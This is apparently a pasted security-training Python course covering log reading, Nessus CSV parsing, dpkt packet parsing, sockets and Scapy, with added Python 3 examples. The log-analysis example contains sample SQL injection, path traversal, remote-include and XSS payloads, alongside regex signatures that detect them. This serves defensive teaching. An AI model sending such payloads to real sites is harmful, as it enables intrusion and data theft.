NOTE:
Use input() for integers and expressions, and use raw_input() when you are dealing with strings.
In Python 2, input() evaluates whatever is typed as a Python expression, so typing a bare name such as joe raises a NameError; raw_input() returns the typed text unchanged.
  1172.  
  1173.  
  1174.  
  1175.  
  1176.  
  1177.  
  1178.  
  1179. #################################
  1180. # Lesson 9: Sequences and Lists #
  1181. #################################
  1182.  
  1183. >>> attacks = ['Stack Overflow', 'Heap Overflow', 'Integer Overflow', 'SQL Injection', 'Cross-Site Scripting', 'Remote File Include']
  1184.  
  1185. >>> attacks
  1186. ['Stack Overflow', 'Heap Overflow', 'Integer Overflow', 'SQL Injection', 'Cross-Site Scripting', 'Remote File Include']
  1187.  
  1188. >>> attacks[3]
  1189. 'SQL Injection'
  1190.  
  1191. >>> attacks[-2]
  1192. 'Cross-Site Scripting'
  1193.  
  1194.  
  1195.  
  1196.  
  1197.  
  1198.  
###########################
# Lesson 10: If Statement #
###########################
Run "IDLE (Python GUI)"

File -> New Window
attack="SQLI"
if attack=="SQLI":
    print 'The attacker is using SQLI'



Run -> Run Module   or  Press "F5"

File -> New Window
attack="XSS"
if attack=="SQLI":
    print 'The attacker is using SQLI'


Run -> Run Module   or  Press "F5"
  1220.  
  1221.  
  1222.  
  1223. #############################
  1224. # Reference Videos To Watch #
  1225. #############################
  1226. Here is your first set of youtube videos that I'd like for you to watch:
  1227. https://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA (watch videos 1-10)
  1228.  
  1229.  
  1230.  
  1231.  
  1232.  
  1233. ####################################
  1234. # Lesson 11: Intro to Log Analysis #
  1235. ####################################
  1236.  
Log in to your StrategicSec Ubuntu machine. You can download the VM from the following link:
  1238.  
  1239. https://s3-us-west-2.amazonaws.com/infosecaddicts/InfoSecAddictsVM.zip
  1240. user:      infosecaddicts
  1241. pass:      infosecaddicts
  1242.  
  1243. Then execute the following commands:
  1244. ---------------------------------------------------------------------------------------------------------
  1245.  
  1246. NOTE: If you are still in your python interpreter then you must type exit() to get back to a regular command-prompt.
  1247.  
  1248. wget https://s3.amazonaws.com/SecureNinja/Python/access_log
  1249.  
  1250.  
  1251. cat access_log | grep 141.101.80.188
  1252.  
  1253. cat access_log | grep 141.101.80.187
  1254.  
  1255. cat access_log | grep 108.162.216.204
  1256.  
  1257. cat access_log | grep 173.245.53.160
  1258.  
  1259. ---------------------------------------------------------
  1260.  
  1261. Google the following terms:
  1262.     - Python read file
  1263.     - Python read line
  1264.     - Python read from file
  1265.  
  1266.  
  1267.  
  1268.  
  1269. ########################################################
  1270. # Lesson 12: Use Python to read in a file line by line #
  1271. ########################################################
  1272.  
  1273.  
  1274. Reference:
  1275. http://cmdlinetips.com/2011/08/three-ways-to-read-a-text-file-line-by-line-in-python/
  1276.  
  1277.  
  1278.  
  1279. ---------------------------------------------------------
  1280. vi logread1.py
  1281.  
  1282.  
## Open the file with read-only permission
  1284. f = open('access_log', "r")
  1285.  
  1286. ## use readlines to read all lines in the file
  1287. ## The variable "lines" is a list containing all lines
  1288. lines = f.readlines()
  1289.  
  1290. print lines
  1291.  
  1292.  
  1293. ## close the file after reading the lines.
  1294. f.close()
  1295.  
  1296. ---------------------------------------------------------
  1297.  
  1298.  
  1299. Google the following:
  1300.     - python difference between readlines and readline
  1301.     - python readlines and readline
  1302.  
  1303.  
  1304.  
  1305.  
  1306.  
  1307. ################################
  1308. # Lesson 13: A quick challenge #
  1309. ################################
  1310.  
Can you write an if/then statement that looks for this IP and prints "Found it"?
  1312.  
  1313.  
  1314. 141.101.81.187
  1315.  
  1316.  
  1317.  
  1318.  
  1319.  
  1320.  
  1321. ---------------------------------------------------------
  1322. Hint 1: Use Python to look for a value in a list
  1323.  
  1324. Reference:
  1325. http://www.wellho.net/mouth/1789_Looking-for-a-value-in-a-list-Python.html
  1326.  
  1327.  
  1328.  
  1329.  
  1330. ---------------------------------------------------------
  1331. Hint 2: Use Python to prompt for user input
  1332.  
  1333. Reference:
  1334. http://www.cyberciti.biz/faq/python-raw_input-examples/
  1335.  
  1336.  
  1337.  
  1338.  
  1339. ---------------------------------------------------------
  1340. Hint 3: Use Python to search for a string in a list
  1341.  
  1342. Reference:
  1343. http://stackoverflow.com/questions/4843158/check-if-a-python-list-item-contains-a-string-inside-another-string
  1344.  
  1345.  
  1346.  
  1347.  
  1348.  
Here is my solution:
-------------------
$ python
>>> f = open('access_log', "r")
>>> lines = f.readlines()
>>> ip = '141.101.81.187'
>>> for string in lines:
...     if ip in string:
...         print(string)
...
>>> f.close()
  1358.  
  1359.  
  1360.  
  1361.  
  1362. Here is one student's solution - can you please explain each line of this code to me?
  1363. -------------------------------------------------------------------------------------
  1364. #!/usr/bin/python
  1365.  
  1366. f = open('access_log')
  1367.  
  1368. strUsrinput = raw_input("Enter IP Address: ")
  1369.  
  1370. for line in iter(f):
  1371.     ip = line.split(" - ")[0]
  1372.     if ip == strUsrinput:
  1373.         print line
  1374.  
  1375. f.close()
  1376.  
  1377.  
  1378.  
  1379.  
  1380. -------------------------------
  1381.  
  1382. Working with another student after class we came up with another solution:
  1383.  
  1384. #!/usr/bin/env python
  1385.  
  1386.  
  1387. # This line opens the log file
  1388. f=open('access_log',"r")
  1389.  
  1390. # This line takes each line in the log file and stores it as an element in the list
  1391. lines = f.readlines()
  1392.  
  1393.  
# This line stores the IP that the user types as a var called userinput
userinput = raw_input("Enter the IP you want to search for: ")



# This combination for loop and nested if statement looks for the IP in the list called lines and prints the entire line if found.
for ip in lines:
    if ip.find(userinput) != -1:
        print ip

# Close the file now that its lines are in memory
f.close()
  1403.  
  1404.  
  1405.  
  1406. ##################################################
# Lesson 14: Look for web attacks in a log file  #
  1408. ##################################################
  1409.  
In this lab we will look at the scan_log.py script, which scans an Apache web server log for common attack attempts.
  1411. Supported attacks:
  1412. 1.      SQL Injection
  1413. 2.      Local File Inclusion
  1414. 3.      Remote File Inclusion
  1415. 4.      Cross-Site Scripting
  1416.  
  1417.  
  1418.  
  1419. wget https://s3.amazonaws.com/SecureNinja/Python/scan_log.py
  1420.  
  1421. The usage for scan_log.py is simple.  You feed it an apache log file.
  1422.  
  1423. cat scan_log.py | less          (use your up/down arrow keys to look through the file)
  1424.  
  1425. Explain to me how this script works.
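
Putting Lessons 11 to 14 together in one script (an added example in Python 3, not the course's scan_log.py): it parses Apache combined-format lines into fields, looks up a client IP exactly, counts requests per IP, and flags the four attack classes scan_log.py covers using simple signatures. The log lines and the bad-host.example URL are constructed; the field layout assumed is the standard combined log format.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample lines in Apache "combined" log format; they are not from the
# course's access_log. The client IPs are the ones grepped for in Lesson 11.
SAMPLE_LOG = """\
141.101.80.188 - - [20/Aug/2012:10:15:32 -0400] "GET /index.php?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
141.101.81.187 - - [20/Aug/2012:10:15:40 -0400] "GET /index.php?id=1%27%20UNION%20SELECT%201,2,3-- HTTP/1.1" 200 734 "-" "Mozilla/5.0"
108.162.216.204 - - [20/Aug/2012:10:16:02 -0400] "GET /view.php?file=../../../../etc/passwd HTTP/1.1" 404 231 "-" "curl/7.26.0"
173.245.53.160 - - [20/Aug/2012:10:16:15 -0400] "GET /page.php?inc=http://bad-host.example/x.txt HTTP/1.1" 200 128 "-" "-"
141.101.81.187 - - [20/Aug/2012:10:16:40 -0400] "GET /search.php?q=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 982 "-" "Mozilla/5.0"
141.101.80.188 - - [20/Aug/2012:10:17:01 -0400] "GET /about.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# One regex for the fixed part of a combined-format line: client IP, timestamp,
# request line, status and response size. Referer and User-Agent stay in "rest".
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+)(?P<rest>.*)$'
)

# Signatures for the four attack classes scan_log.py covers. They are deliberately
# simple and will miss obfuscated payloads; they show the approach, not a product.
ATTACK_PATTERNS = {
    "SQL Injection": re.compile(r"(union\s+select|'\s*or\s+\d+\s*=\s*\d+|;\s*drop\s+table)", re.I),
    "Local File Inclusion": re.compile(r"(\.\./|/etc/passwd|/proc/self/)", re.I),
    "Remote File Inclusion": re.compile(r"=\s*(https?|ftp)://", re.I),
    "Cross-Site Scripting": re.compile(r"(<script|javascript:|on(error|load)\s*=)", re.I),
}


def parse_line(line):
    """Split one log line into named fields, or return None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_ip(lines, ip):
    """Lesson 13: return the raw lines whose client IP field equals ip exactly.
    Matching on the parsed field avoids 141.101.8.18 also matching 141.101.80.188."""
    hits = []
    for line in lines:
        p = parse_line(line)
        if p and p["ip"] == ip:
            hits.append(line)
    return hits


def hits_per_ip(lines):
    """Count requests per client IP (the Python version of the Lesson 11 greps)."""
    return Counter(p["ip"] for p in map(parse_line, lines) if p)


def classify(path):
    """Return the attack classes whose signature matches the URL-decoded path."""
    decoded = unquote(path)
    return [name for name, rx in ATTACK_PATTERNS.items() if rx.search(decoded)]


def scan_log(lines):
    """Lesson 14: list (client_ip, attack_class, decoded_path) for suspicious requests."""
    findings = []
    for p in filter(None, map(parse_line, lines)):
        for name in classify(p["path"]):
            findings.append((p["ip"], name, unquote(p["path"])))
    return findings


if __name__ == "__main__":
    lines = SAMPLE_LOG.splitlines()
    for ip, count in hits_per_ip(lines).most_common():
        print("%-16s %d requests" % (ip, count))
    for ip, name, path in scan_log(lines):
        print("%-16s %-22s %s" % (ip, name, path))
```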
  1426.  
  1427.  
  1428.  
  1429. ################################
  1430. # Lesson 15: Parsing CSV Files #
  1431. ################################
  1432.  
  1433. Dealing with csv files
  1434.  
  1435. Reference:
  1436. http://www.pythonforbeginners.com/systems-programming/using-the-csv-module-in-python/
  1437.  
  1438. Type the following commands:
  1439. ---------------------------------------------------------------------------------------------------------
  1440.  
  1441. wget https://s3.amazonaws.com/SecureNinja/Python/class_nessus.csv
  1442.  
  1443.  
  1444. Example 1 - Reading CSV files
  1445. -----------------------------
#To be able to read csv formatted files, we will first have to import the
#csv module.
  1448.  
  1449.  
  1450. import csv
  1451. with open('class_nessus.csv', 'rb') as f:
  1452.     reader = csv.reader(f)
  1453.     for row in reader:
  1454.         print row
  1455.  
  1456.  
  1457.  
  1458.  
  1459.  
  1460.  
  1461. Example 2 - Reading CSV files
  1462. -----------------------------
  1463. vi readcsv.py
  1464.  
  1465.  
  1466. #!/usr/bin/python
  1467. import csv                  # imports the csv module
  1468. import sys                  # imports the sys module
  1469.  
  1470. f = open(sys.argv[1], 'rb')         # opens the csv file
  1471. try:
  1472.     reader = csv.reader(f)          # creates the reader object
    for row in reader:          # iterates over the rows of the file in order
  1474.         print row               # prints each row
  1475. finally:
  1476.     f.close()               # closing
  1477.  
  1478.  
  1479.  
  1480.  
  1481.  
  1482.  
  1483. Example 3 - - Reading CSV files
  1484. -------------------------------
  1485. vi readcsv2.py
  1486.  
  1487.  
  1488. #!/usr/bin/python
# This program reads the CSV file and displays its contents.
  1490.  
  1491.  
  1492. import csv
  1493.  
  1494. ifile  = open('class_nessus.csv', "rb")
  1495. reader = csv.reader(ifile)
  1496.  
  1497. rownum = 0
  1498. for row in reader:
  1499.     # Save header row.
  1500.     if rownum == 0:
  1501.         header = row
  1502.     else:
  1503.         colnum = 0
  1504.         for col in row:
  1505.             print '%-8s: %s' % (header[colnum], col)
  1506.             colnum += 1
  1507.            
  1508.     rownum += 1
  1509.  
  1510. ifile.close()
  1511.  
  1512.  
  1513.  
  1514.  
  1515.  
  1516.  
  1517.  
  1518.  
  1519. python readcsv2.py | less
  1520.  
  1521.  
  1522.  
  1523.  
  1524.  
  1525.  
  1526.  
  1527.  
  1528. /---------------------------------------------------/    
  1529. --------------------PARSING CSV FILES----------------
  1530. /---------------------------------------------------/
  1531.  
  1532. -------------TASK 1------------
  1533. vi readcsv3.py
  1534.  
  1535. #!/usr/bin/python
  1536. import csv
  1537. f = open('class_nessus.csv', 'rb')
  1538. try:
  1539.     rownum = 0
  1540.     reader = csv.reader(f)
  1541.     for row in reader:
        # Save header row.
  1543.         if rownum == 0:
  1544.             header = row
  1545.         else:
  1546.             colnum = 0
  1547.             if row[3].lower() == 'high':
  1548.                 print '%-1s: %s     %-1s: %s     %-1s: %s     %-1s: %s' % (header[3], row[3],header[4], row[4],header[5], row[5],header[6], row[6])
  1549.         rownum += 1
  1550. finally:
  1551.     f.close()
  1552.  
  1553.  
  1554.  
  1555.  
  1556.  
  1557. python readcsv3.py | less
  1558.    
  1559. -------------TASK 2------------
  1560. vi readcsv4.py
  1561.  
  1562. #!/usr/bin/python
  1563. import csv
  1564. f = open('class_nessus.csv', 'rb')
  1565. try:
  1566.     print '/---------------------------------------------------/'
  1567.     rownum = 0
  1568.     hosts = {}
  1569.     reader = csv.reader(f)
  1570.     for row in reader:
  1571.         # Save header row.
  1572.         if rownum == 0:
  1573.             header = row
  1574.         else:
  1575.             colnum = 0
  1576.             if row[3].lower() == 'high' and row[4] not in hosts:
  1577.                 hosts[row[4]] = row[4]
  1578.                 print '%-1s: %s     %-1s: %s     %-1s: %s     %-1s: %s' % (header[3], row[3],header[4], row[4],header[5], row[5],header[6], row[6])
  1579.         rownum += 1
  1580. finally:
  1581.     f.close()
  1582.  
  1583.  
  1584. python readcsv4.py | less
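
An added example (Python 3, not the course's code) that does Task 1 and Task 2 with csv.DictReader and adds a per-host count by risk level; the CSV text is constructed to follow the column order the course scripts index (Risk in column 3, Host in column 4, Protocol 5, Port 6), with made-up plugin IDs and empty CVE fields.

```python
import csv
import io
from collections import Counter, defaultdict

# Constructed sample in the column order readcsv3.py/readcsv4.py index into.
# Plugin IDs are made up; this is not the course's class_nessus.csv.
SAMPLE_CSV = """\
Plugin ID,CVE,CVSS,Risk,Host,Protocol,Port,Name
90001,,5.0,Medium,10.10.30.5,tcp,80,Constructed medium finding
90002,,10.0,High,10.10.30.5,tcp,445,Constructed high finding
90003,,10.0,High,10.10.30.5,tcp,139,"Constructed high finding, with a comma in the name"
90004,,0.0,None,10.10.30.7,icmp,0,Constructed informational finding
90002,,10.0,High,10.10.30.9,tcp,445,Constructed high finding
90005,,7.5,High,10.10.30.9,tcp,22,Constructed high finding on SSH
"""


def load_findings(text):
    """Parse CSV text into a list of dicts keyed by the header row.
    DictReader replaces the manual rownum/header bookkeeping in the course scripts.
    (Python 3: open real files with newline='' instead of the Python 2 'rb' mode.)"""
    return list(csv.DictReader(io.StringIO(text)))


def filter_by_risk(findings, risk):
    """Task 1: keep only rows whose Risk column equals risk (case-insensitive)."""
    return [f for f in findings if f["Risk"].lower() == risk.lower()]


def hosts_with_risk(findings, risk):
    """Task 2: the distinct hosts with at least one finding at this risk level, sorted."""
    return sorted({f["Host"] for f in filter_by_risk(findings, risk)})


def summary_by_host(findings):
    """Count findings per host and risk level, e.g. {'10.10.30.5': Counter({'High': 2, ...})}."""
    summary = defaultdict(Counter)
    for f in findings:
        summary[f["Host"]][f["Risk"]] += 1
    return dict(summary)


def format_row(f):
    """The same four columns the course prints: Risk, Host, Protocol, Port."""
    return "Risk: %-6s Host: %-15s Protocol: %-4s Port: %s" % (
        f["Risk"], f["Host"], f["Protocol"], f["Port"])


if __name__ == "__main__":
    findings = load_findings(SAMPLE_CSV)
    print("/---------------------------------------------------/")
    for f in filter_by_risk(findings, "high"):
        print(format_row(f))
    print("Hosts with High findings:", ", ".join(hosts_with_risk(findings, "high")))
    for host, counts in sorted(summary_by_host(findings).items()):
        print(host, dict(counts))
```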
  1585.  
  1586.  
  1587.  
  1588.  
  1589.  
  1590.  
  1591.  
  1592.  
  1593.  
  1594.  
  1595.  
  1596.  
  1597.  
  1598.  
  1599. #################################################
  1600. # Lesson 16: Parsing Packets with Python's DPKT #
  1601. #################################################
  1602. The first thing that you will need to do is install dpkt.
  1603.  
  1604. sudo apt-get install -y python-dpkt
  1605.  
  1606.  
  1607.  
  1608.  
Now cd to your courseware directory, and then cd into the subfolder '2-PCAP-Parsing/Resources'.
Run tcpdump to capture a .pcap file that we will use for the next exercise.
  1611.  
  1612.  
  1613. sudo tcpdump -ni eth0 -s0 -w quick.pcap
  1614.  
  1615.  
  1616. --open another command prompt--
  1617. wget http://packetlife.net/media/library/12/tcpdump.pdf
  1618.  
  1619.  
  1620. Let's do something simple:
  1621.  
  1622.  
  1623. vi quickpcap.py
  1624. --------------------------------------------------------
  1625.  
#!/usr/bin/python
import dpkt

# Simple script to read the timestamps in a pcap file
# Reference: http://superbabyfeng.blogspot.com/2009/05/dpkt-tutorial-0-simple-example-how-to.html

f = open("quick.pcap","rb")
pcap = dpkt.pcap.Reader(f)

# dpkt yields a (timestamp, raw frame bytes) pair for every packet in the file
for ts, buf in pcap:
    print ts

f.close()
  1639.  
  1640.  
  1641. --------------------------------------------------------
  1642.  
  1643. Now let's run the script we just wrote
  1644.  
  1645.  
  1646. python quickpcap.py
  1647.  
  1648.  
  1649.  
  1650.  
  1651. How dpkt breaks down a packet:
  1652.  
  1653. Reference:
  1654. http://superbabyfeng.blogspot.com/2009/05/dpkt-tutorial-1-dpkt-sub-modules.html
  1655.  
  1656.     src: the MAC address of SOURCE.
  1657.     dst: The MAC address of DESTINATION
  1658.     type: The protocol type of contained ethernet payload.
  1659.  
  1660. The allowed values are listed in the file "ethernet.py",
  1661. such as:
  1662. a) ETH_TYPE_IP: It means that the ethernet payload is IP layer data.
  1663. b) ETH_TYPE_IPX: Means that the ethernet payload is IPX layer data.
  1664.  
  1665.  
  1666. References:
  1667. http://stackoverflow.com/questions/6337878/parsing-pcap-files-with-dpkt-python
  1668.  
  1669.  
  1670.  
  1671.  
  1672.  
  1673.  
  1674. Ok - now let's have a look at pcapparsing.py
  1675.  
  1676. sudo tcpdump -ni eth0 -s0 -w capture-100.pcap
  1677.  
  1678.  
  1679. --open another command prompt--
  1680. wget http://packetlife.net/media/library/13/Wireshark_Display_Filters.pdf
  1681.  
  1682.  
  1683.  
  1684. Ok - now let's have a look at pcapparsing.py
  1685. --------------------------------------------------------
  1686.  
import socket
import dpkt
import sys
f = open('capture-100.pcap','rb')
pcapReader = dpkt.pcap.Reader(f)

for ts,data in pcapReader:
    ether = dpkt.ethernet.Ethernet(data)
    # A bare raise with no active exception aborts the script on the first non-IP frame
    if ether.type != dpkt.ethernet.ETH_TYPE_IP: raise
    ip = ether.data
    tcp = ip.data
    src = socket.inet_ntoa(ip.src)
    srcport = tcp.sport
    dst = socket.inet_ntoa(ip.dst)
    dstport = tcp.dport
    print "src: %s (port : %s)-> dest: %s (port %s)" % (src,srcport ,dst,dstport)

f.close()
  1705.  
  1706. --------------------------------------------------------
  1707.  
  1708.  
  1709.  
  1710. OK - let's run it:
  1711. python pcapparsing.py
  1712.  
  1713.  
  1714.  
Running this script might throw an error like this:
  1716.  
  1717. Traceback (most recent call last):
  1718.   File "pcapparsing.py", line 9, in <module>
  1719.     if ether.type != dpkt.ethernet.ETH_TYPE_IP: raise
  1720.  
  1721.  
If it does, that is because the capture contains a frame the script did not allow for: a frame that is not IP at all (ARP, for example) trips the bare raise, and an IP packet that is not TCP (ICMP, for example) has no sport/dport fields.
  1723.  
  1724.  
  1725.  
  1726.  
  1727. Your homework for today...
  1728.  
  1729.  
  1730. Rewrite this pcapparsing.py so that it prints out the timestamp, the source and destination IP addresses, and the source and destination ports.
  1731.  
  1732.  
  1733.  
  1734.  
  1735.  
  1736.  
  1737. Your challenge is to fix the Traceback error
  1738.  
  1739.  
  1740.  
  1741.  
  1742. #!/usr/bin/python
  1743.  
  1744. import pcapy
  1745. import dpkt
  1746. import sys
  1747. import socket
  1748. import struct
  1749.  
  1750. SINGLE_SHOT = False
  1751.  
  1752. # list all the network devices
  1753. pcapy.findalldevs()
  1754.  
  1755. iface = "eth0"
  1756. filter = "arp"
  1757. max_bytes = 1024
  1758. promiscuous = False
  1759. read_timeout = 100 # in milliseconds
  1760.  
  1761. pc = pcapy.open_live( iface, max_bytes, promiscuous, read_timeout )
  1762. pc.setfilter( filter )
  1763.  
  1764. # callback for received packets
  1765. def recv_pkts( hdr, data ):
  1766.     packet = dpkt.ethernet.Ethernet( data )
  1767.  
  1768.     print type( packet.data )
  1769.     print "ipsrc: %s, ipdst: %s" %( \
  1770.                  socket.inet_ntoa( packet.data.spa ), \
  1771.                  socket.inet_ntoa( packet.data.tpa ) )
  1772.  
  1773.     print "macsrc: %s, macdst: %s " % (
  1774.                 "%x:%x:%x:%x:%x:%x" % struct.unpack("BBBBBB",packet.data.sha),
  1775.                 "%x:%x:%x:%x:%x:%x" % struct.unpack("BBBBBB",packet.data.tha ) )
  1776.  
  1777. if SINGLE_SHOT:
  1778.     header, data = pc.next()
  1779.     sys.exit(0)
  1780. else:
  1781.     packet_limit = -1 # infinite
  1782.     pc.loop( packet_limit, recv_pkts ) # capture packets
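
For the homework and the Traceback challenge above, an added example written with only the standard library, so it runs without dpkt or a capture file: it builds two constructed IP frames and one ARP frame, decodes Ethernet/IPv4/TCP/UDP by hand the way dpkt's sub-modules do, skips frames that are not IP instead of raising, and prints timestamp, addresses and ports. Frame contents and MAC addresses are constructed; the (timestamp, bytes) pairs stand in for what dpkt.pcap.Reader yields.

```python
import socket
import struct

ETH_TYPE_IP = 0x0800    # same value dpkt exposes as dpkt.ethernet.ETH_TYPE_IP
ETH_TYPE_ARP = 0x0806
IP_PROTO_TCP = 6
IP_PROTO_UDP = 17

# Constructed MAC addresses for the sample frames.
SRC_MAC = bytes.fromhex("020000000001")
DST_MAC = bytes.fromhex("020000000002")


def build_ip_frame(src, sport, dst, dport, proto):
    """Build an Ethernet/IPv4 frame carrying a minimal TCP or UDP header (constructed, no checksums)."""
    if proto == IP_PROTO_TCP:
        # sport, dport, seq, ack, data offset (5 words), flags (SYN), window, csum, urg
        l4 = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, 0x02, 8192, 0, 0)
    else:
        l4 = struct.pack("!HHHH", sport, dport, 8, 0)   # UDP: ports, length, checksum
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(l4), 0, 0, 64, proto, 0,
                     socket.inet_aton(src), socket.inet_aton(dst))
    return DST_MAC + SRC_MAC + struct.pack("!H", ETH_TYPE_IP) + ip + l4


def build_arp_frame():
    """An ARP request frame: exactly the kind of packet that made pcapparsing.py raise."""
    arp = struct.pack("!HHBBH6s4s6s4s", 1, 0x0800, 6, 4, 1,
                      SRC_MAC, socket.inet_aton("10.10.30.5"),
                      b"\x00" * 6, socket.inet_aton("10.10.30.1"))
    return DST_MAC + SRC_MAC + struct.pack("!H", ETH_TYPE_ARP) + arp


def parse_frame(buf):
    """Return a dict with src/dst IPs and ports, or None for frames we do not handle.
    Returning None (instead of a bare raise) is the fix for the Traceback in the lesson."""
    if len(buf) < 34:                     # 14-byte Ethernet + 20-byte IPv4 minimum
        return None
    eth_type = struct.unpack("!H", buf[12:14])[0]
    if eth_type != ETH_TYPE_IP:           # ARP, IPv6, ...: skip, do not crash
        return None
    ihl = (buf[14] & 0x0F) * 4            # IP header length in bytes (options included)
    proto = buf[14 + 9]
    src = socket.inet_ntoa(buf[14 + 12:14 + 16])
    dst = socket.inet_ntoa(buf[14 + 16:14 + 20])
    l4 = buf[14 + ihl:]
    if proto in (IP_PROTO_TCP, IP_PROTO_UDP) and len(l4) >= 4:
        sport, dport = struct.unpack("!HH", l4[:4])   # ports sit first in both headers
    else:                                 # ICMP etc.: no ports to report
        sport = dport = None
    return {"src": src, "sport": sport, "dst": dst, "dport": dport, "proto": proto}


def summarize(packets):
    """The homework output: one line per IP packet with timestamp, addresses and ports.
    packets is an iterable of (timestamp, raw_frame) pairs, like dpkt.pcap.Reader yields."""
    lines = []
    skipped = 0
    for ts, buf in packets:
        p = parse_frame(buf)
        if p is None:
            skipped += 1
            continue
        lines.append("%.6f src: %s (port %s) -> dst: %s (port %s)"
                     % (ts, p["src"], p["sport"], p["dst"], p["dport"]))
    return lines, skipped


if __name__ == "__main__":
    sample = [
        (1.0, build_ip_frame("10.10.30.5", 40001, "10.10.30.1", 80, IP_PROTO_TCP)),
        (1.5, build_arp_frame()),
        (2.0, build_ip_frame("10.10.30.1", 53, "10.10.30.5", 40002, IP_PROTO_UDP)),
    ]
    out, skipped = summarize(sample)
    print("\n".join(out))
    print("skipped %d non-IP frame(s)" % skipped)
```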
  1783.  
  1784.  
  1785.  
  1786.  
  1787.  
  1788.  
  1789.  
  1790.  
  1791. #############################
  1792. # Reference Videos To Watch #
  1793. #############################
  1794. Here is your second set of youtube videos that I'd like for you to watch:
  1795. https://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA (watch videos 11-20)
  1796.  
  1797.  
  1798.  
  1799.  
  1800. #############################################
  1801. # Lesson 17: Python Sockets & Port Scanning #
  1802. #############################################
  1803.  
  1804.  
  1805. $ ncat -l -v -p 1234
  1806.  
  1807.  
  1808.  
  1809.  
  1810. --open another terminal--
  1811. python
  1812.  
  1813. >>> import socket
  1814. >>> s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  1815. >>> s.connect(('localhost', 1234))
  1816. >>> s.send('Hello, world')
  1817. >>> data = s.recv(1024)
  1818. >>> s.close()
  1819.  
  1820. >>> print 'Received', data
  1821.  
  1822.  
  1823.  
  1824.  
  1825.  
  1826.  
  1827. ########################################
  1828. # Lesson 18: TCP Client and TCP Server #
  1829. ########################################
  1830.  
  1831. vi tcpclient.py
  1832.  
  1833.  
  1834.  
  1835. #!/usr/bin/python
  1836. # tcpclient.py
  1837.  
  1838. import socket
  1839.  
  1840. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  1841. hostport = ("127.0.0.1", 1337)
  1842. s.connect(hostport)
  1843. s.send("Hello\n")
  1844. buf = s.recv(1024)
  1845. print "Received", buf
  1846.  
  1847.  
  1848.  
  1849.  
  1850.  
  1851.  
  1852.  
  1853.  
  1854.  
  1855. vi tcpserver.py
  1856.  
  1857.  
  1858.  
  1859.  
  1860.  
  1861. #!/usr/bin/python
  1862. # tcpserver.py
  1863.  
  1864. import socket
  1865.  
  1866. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  1867. hostport = ("", 1337)
  1868. s.bind(hostport)
  1869. s.listen(10)
  1870. while 1:
  1871.     cli,addr = s.accept()
  1872.     print "Connection from", addr
  1873.     buf = cli.recv(1024)
  1874.     print "Received", buf
  1875.     if buf == "Hello\n":
  1876.         cli.send("Server ID 1\n")
  1877.     cli.close()
  1878.  
  1879.  
  1880.  
  1881.  
  1882.  
  1883.  
  1884.  
  1885.  
  1886. python tcpserver.py
  1887.  
  1888.  
  1889. --open another terminal--
  1890. python tcpclient.py
  1891.  
  1892.  
  1893. ########################################
  1894. # Lesson 19: UDP Client and UDP Server #
  1895. ########################################
  1896.  
  1897. vi udpclient.py
  1898.  
  1899.  
  1900.  
  1901.  
  1902.  
  1903.  
  1904. #!/usr/bin/python
  1905. # udpclient.py
  1906.  
  1907. import socket
  1908.  
  1909. s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
  1910. hostport = ("127.0.0.1", 1337)
  1911. s.sendto("Hello\n", hostport)
  1912. buf = s.recv(1024)
  1913. print buf
  1914.  
  1915.  
  1916.  
  1917.  
  1918.  
  1919.  
  1920.  
  1921.  
  1922.  
  1923. vi udpserver.py
  1924.  
  1925.  
  1926.  
  1927.  
  1928.  
  1929.  
  1930. #!/usr/bin/python
  1931. # udpserver.py
  1932.  
  1933. import socket
  1934.  
  1935. s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
  1936. hostport = ("127.0.0.1", 1337)
  1937. s.bind(hostport)
  1938. while 1:
  1939.     buf, address = s.recvfrom(1024)
  1940.     print buf
  1941.     if buf == "Hello\n":
  1942.         s.sendto("Server ID 1\n", address)
  1943.  
  1944.  
  1945.  
  1946.  
  1947.  
  1948.  
  1949. python udpserver.py
  1950.  
  1951.  
  1952. --open another terminal--
  1953. python udpclient.py
  1954.  
  1955.  
  1956.  
  1957.  
  1958.  
  1959.  
  1960. ###############################
  1961. # Lesson 20: Installing Scapy #
  1962. ###############################
  1963.  
  1964. sudo apt-get update
  1965. sudo apt-get install python-scapy python-pyx python-gnuplot
  1966.  
  1967.  
  1968. Reference Page For All Of The Commands We Will Be Running:
  1969. http://samsclass.info/124/proj11/proj17-scapy.html
  1970.  
  1971. Great slides for Scapy:
  1972. http://www.secdev.org/conf/scapy_csw05.pdf
  1973.  
  1974.  
  1975.  
  1976.  
  1977. To run Scapy interactively
  1978.  
  1979.     sudo scapy
  1980.  
  1981.  
  1982.  
  1983. ################################################
  1984. # Lesson 21: Sending ICMPv4 Packets with scapy #
  1985. ################################################
  1986.  
  1987. In the Linux machine, in the Terminal window, at the >>> prompt, type this command, and then press the Enter key:
  1988.  
  1989.     i = IP()
  1990.  
  1991.  
  1992.  
  1993.  
  1994. This creates an object named i of type IP. To see the properties of that object, use the display() method with this command:
  1995.  
  1996.     i.display()
  1997.  
  1998.  
  1999.  
  2000.  
  2001. Use these commands to set the destination IP address and display the properties of the i object again. Replace the IP address in the first command with the IP address of your target Windows machine:
  2002.  
  2003.     i.dst="10.65.75.49"
  2004.  
  2005.     i.display()
  2006.  
  2007.  
  2008.  
  2009.  
  2010. Notice that scapy automatically fills in your machine's source IP address.
  2011.  
  2012. Use these commands to create an object named ic of type ICMP and display its properties:
  2013.  
  2014.  
  2015.     ic = ICMP()
  2016.  
  2017.     ic.display()
  2018.  
  2019.  
  2020.  
  2021.  
  2022.  
  2023. Use this command to send the packet onto the network and listen to a single packet in response. Note that the third character is the numeral 1, not a lowercase L:
